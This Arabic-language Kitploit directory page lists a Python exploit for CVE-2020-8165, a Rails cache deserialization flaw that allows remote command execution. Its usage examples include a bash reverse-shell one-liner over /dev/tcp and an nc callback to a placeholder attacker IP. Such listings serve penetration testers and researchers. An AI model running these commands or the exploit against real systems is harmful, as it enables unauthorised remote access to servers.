Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-8165 — استغلال Python لـ CVE-2020-8165 يستهدف Rails MemCacheStore و RedisCacheStore. يتيح تنفيذ أوامر عن بُعد عبر إلغاء تسلسل الكائنات التي يوفرها المستخدم باستخدام واجهة قائمة على argparse. | Kitploit
أدوات/GitHubGitHub/hybryx/cve-2020-8165
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubhybryx/cve-2020-8165

CVE-2020-8165

استغلال Python لـ CVE-2020-8165 يستهدف Rails MemCacheStore و RedisCacheStore. يتيح تنفيذ أوامر عن بُعد عبر إلغاء تسلسل الكائنات التي يوفرها المستخدم باستخدام واجهة قائمة على argparse.

عرض المستودع
4منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2020-8165 بلغة Python

هذا كود لاستغلال CVE-2020-8165 باستخدام Python3. هذا الاستغلال يعمل مع Rails < 5.2.4.3, Rails < 6.0.3.1. يسمح الاستغلال للمهاجم بإلغاء تعبئة (unmarshal) الكائنات التي يوفرها المستخدم في MemCacheStore و RedisCacheStore. يستخدم هذا الكود ArgParse لتمكين المستخدم من استغلال هذه الثغرة بسهولة شديدة.

الاستخدام

هناك خمس وسائط لهذا الاستغلال:

  • rHost - عنوان IP الخاص بالمضيف البعيد المستهدف
  • rPort - رقم المنفذ الخاص بالمضيف البعيد المستهدف الذي يعمل عليه Rails
  • email - البريد الإلكتروني المستخدم لتسجيل الدخول إلى الخدمة
  • password - كلمة مرور الحساب لتسجيل الدخول إلى الخدمة
  • cmd - الأمر الذي سيتم تنفيذه، بين علامتي اقتباس لمراعاة المسافات

أمثلة:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

الاعتمادات الرئيسية

تفاصيل CVE الأصلية: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 كود الاستغلال من Pastebin الذي قمت بتحسينه وإضافة arg parse: https://pastebin.com/jpHpdBTk

تنزيل الأداة